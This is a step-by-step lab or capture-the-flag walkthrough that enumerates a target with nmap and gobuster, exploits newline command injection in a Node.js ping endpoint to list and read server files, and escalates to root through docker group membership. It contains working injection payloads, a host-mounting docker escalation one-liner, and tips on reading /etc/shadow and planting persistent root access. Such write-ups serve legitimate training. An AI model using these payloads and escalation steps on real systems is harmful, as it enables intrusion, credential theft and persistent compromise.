1. Exporting the IP Address

The first command is:

export IP=10.10.82.85
  • Explanation:
    • This command sets an environment variable called IP with the value 10.10.82.85 (the IP of the target machine).
    • Why use it? It makes it easier to reference the IP in future commands without needing to type it every time. By using $IP later, you reference this stored value. Because it is exported, child processes such as nmap and curl see it too, but it only lives in this shell session: a new terminal starts without it, so set it again there.

Basic Example:

If you wanted to ping the target, you could now type:

ping $IP

And this would automatically translate to:

ping 10.10.82.85

2. Nmap Enumeration

Initial Nmap Scan

We perform a basic scan to gather information about the target services:

nmap -sC -sV -v $IP -oN nmap/initial.nmap
  • Explanation:
    • nmap: This is a network scanning tool used to discover hosts and services.
    • -sC: Runs the "default" category of Nmap Scripting Engine scripts. These are quick, low-risk information gatherers (for example ftp-anon, ssh-hostkey and http-title); they are not the vulnerability-scanning scripts, which live in the vuln category and have to be requested explicitly.
    • -sV: Probes each open port to identify the service and its version, so you know exactly what software is listening.
    • -v: Enables verbose mode, which provides more detailed output during the scan.
    • -oN nmap/initial.nmap: Saves the results in Nmap's normal (human-readable) format to nmap/initial.nmap for review later. The nmap/ directory must already exist; create it with mkdir -p nmap first, or Nmap will fail to open the output file.

Why This Matters:

  • This scan helps identify the types of services running (like SSH, FTP, or HTTP) and their version numbers, which could help find vulnerabilities or misconfigurations.

Explanation of Nmap Results

From the scan, we get this output:

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
31331/tcp open  http    Apache httpd 2.4.29 (Ubuntu)
  • Port 21 (FTP):
    • Service: vsftpd (Very Secure FTP Daemon), version 3.0.3.
    • FTP is a plaintext file-transfer protocol. Some servers allow anonymous access, where anyone can log in without credentials; the ftp-anon script that -sC runs reports this when it is enabled, so check the script output before trying it by hand.
  • Port 22 (SSH):
    • Service: OpenSSH 7.6p1, a secure shell service used for remote login and command execution.
    • SSH is typically secured with usernames and passwords or key-based authentication. It is rarely the way in by itself, but it becomes valuable once credentials are found elsewhere.
  • Port 31331 (HTTP):
    • Service: Apache httpd 2.4.29 on Ubuntu. This is where the website runs. A version number alone is not a finding; the site's content and configuration are what usually matter, so this port gets directory enumeration below.

Next Step: Full Port Scan

Now, let’s scan all ports on the machine. This helps catch any ports that were missed in the first scan.

nmap -p- -T5 -v $IP -oN nmap/all_ports.nmap
  • Explanation:
    • -p-: Scans all 65,535 TCP ports (not just the 1,000 most common ones that a default scan covers).
    • -T5: The most aggressive timing template. It is fast but can drop results on a slow or lossy link; if the output looks incomplete, re-run with -T4, which is slower but more reliable.
    • -oN: Again, saving the output for future reference.

Explanation of Full Nmap Scan Results

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
8081/tcp open  blackice-icecap
  • Port 8081:
    • This port was not in the initial scan, which only covered the top 1,000 ports. The "blackice-icecap" label is just Nmap's lookup of port 8081 in its nmap-services table, not a fingerprint; without -sV the scan has not probed the service itself, so the next step is a version scan of this single port (which identifies it as Node.js).
    • Note that port 31331, found by the first scan, is missing from this output. That is the kind of dropout -T5 can cause, so treat the two scans as complementary rather than trusting either alone.

3. Investigating Specific Ports

Now, since we identified a service on port 8081, let's dig deeper to see what’s running on that port.

nmap -sV -p 8081 $IP -oN port_8081.nmap
  • Explanation:
    • -sV: Attempts to detect the service and its version.
    • -p 8081: Only scan port 8081.
    • -oN: Saves the output to port_8081.nmap.

Nmap Result for Port 8081

PORT     STATE SERVICE VERSION
8081/tcp open  http    Node.js Express framework
  • Node.js Express framework:
    • Express is a web framework that runs on Node.js, commonly used for building APIs and web applications. The fingerprint tells us the backend is JavaScript; whether user input ends up in a shell command is decided by the application's own code, not by Express. An endpoint that wraps a system utility (a "ping" feature, for instance) is the classic place to look for command injection.

4. Gobuster Directory Brute Forcing

We know that port 31331 is running a web server (Apache). Now, we can use Gobuster to brute force directories and files.

Brute Forcing Directories on Port 31331

gobuster dir -t 64 -u http://$IP:31331 -w ~/wordlists/website_dir/directory-list-2.3-medium.txt -x .php,.html,.txt -o gobuster/dir_med_31331.gobuster
  • Explanation:
    • gobuster: Tool used to brute force directories and files on web servers.
    • dir: Directory brute forcing mode.
    • -t 64: Uses 64 threads (speeding up the process).
    • -u: The target URL (http://$IP:31331).
    • -w: The wordlist you use to brute force (in this case, a medium-sized directory list).
    • -x: Also tries each word with the file extensions .php, .html and .txt appended.
    • -o: Saves the output to a file (gobuster/dir_med_31331.gobuster). As with the nmap/ directory, gobuster/ has to exist beforehand.

Results:

/partners.html        (Status: 200)
/robots.txt           (Status: 200)
  • robots.txt is a file that tells search engines which directories they should avoid indexing. Sometimes, it contains useful information about hidden or important directories.

Check Robots.txt:

curl $IP:31331/robots.txt

This gives us:

/utech_sitemap.txt

Check Sitemap:

curl $IP:31331/utech_sitemap.txt

This sitemap shows the important directories on the web server:

/
/index.html
/what.html
/partners.html

Navigating to /partners.html shows a login page. Submitting the form shows that it sends the login request to the Node.js service on port 8081 (the /auth endpoint), so the Apache site is only the front end for the API on 8081. That API is the interesting attack surface, and it is where we look for command injection next.


5. Exploring Vulnerabilities

The service on port 8081 has a ping functionality. This might be vulnerable to command injection if not properly sanitized.

Test for Command Injection

First, let’s set up a tcpdump session on our own machine to capture ping requests:

sudo tcpdump -i utun1 icmp
  • Explanation:
    • tcpdump: A command-line packet capture tool. Capturing needs raw-socket access, hence sudo.
    • -i utun1: The interface to listen on. Use the one that carries your VPN tunnel to the target (utun1 here, on macOS; on Linux it is typically tun0). Check with ifconfig or ip addr.
    • icmp: A capture filter so only ICMP packets (ping) are shown.

Send a Ping Request to Your Machine

curl "$IP:8081/ping?ip=YOUR_IP"

Replace YOUR_IP with your own address on the VPN interface. If an ICMP echo request from $IP shows up in tcpdump, the endpoint really executes ping against the value you supplied. That by itself is the intended behaviour, but it confirms user input reaches a system command, which is the precondition for the injection tested next.


6. Exploiting Command Injection

To exploit this, we need to inject commands into the ping request.

Injecting Commands Using URL Encoding

We know that %0A is the URL-encoded form of a newline (\n). In a shell, a newline ends one command and starts the next, so if the server builds its ping command as a string and hands it to a shell, everything after %0A runs as a separate command. Let's try running an ls command:

curl "$IP:8081/ping?ip=YOUR_IP%0Als"
  • Explanation:
    • %0A: Newline, which allows us to execute a second command (ls) after the ping. Encoded separators such as %3B (;) or %7C (|) work the same way; the newline is simply the least likely to be filtered.
    • This results in a directory listing of the application's working directory:

      index.js
      node_modules
      package.json

Extracting Sensitive Data

Let's attempt to read files from the server, such as a database. The same trick works with cat, with the space encoded as %20 so it survives in the URL:

curl "$IP:8081/ping?ip=YOUR_IP%0Acat%20FILE"

Replace FILE with the path of the file you want to read. We retrieve sensitive information, including usernames and password hashes, which can then be cracked offline.


7. Privilege Escalation via Docker

After logging in via SSH (using cracked credentials), we check for potential privilege escalation paths.

Check for Docker Group Membership

id

We find the user is part of the docker group, which can be exploited to gain root access.

Exploiting Docker for Privilege Escalation

Use the GTFOBins technique for docker: run a container with the host's filesystem mounted and chroot into it. Anyone in the docker group can talk to the Docker daemon, which runs as root, so this needs no password:

docker run -v /:/mnt --rm -it bash chroot /mnt sh
  • Explanation:
    • -v /:/mnt: Mounts the root of the host filesystem (/) at /mnt inside the container.
    • --rm -it: Removes the container on exit and attaches an interactive terminal.
    • bash: The image to run. It has to be available locally or pullable; on an offline target, run docker images and substitute whatever image is present (GTFOBins shows the same command with alpine).
    • chroot /mnt sh: Changes the root to the mounted host filesystem and spawns a shell. Inside the container you are root, and since /mnt is the host's /, that shell can read and write any file on the host.

That shell is root over the host filesystem, which is enough to read /root and /etc/shadow, or to add an SSH key or a SUID binary for a persistent root login on the host itself.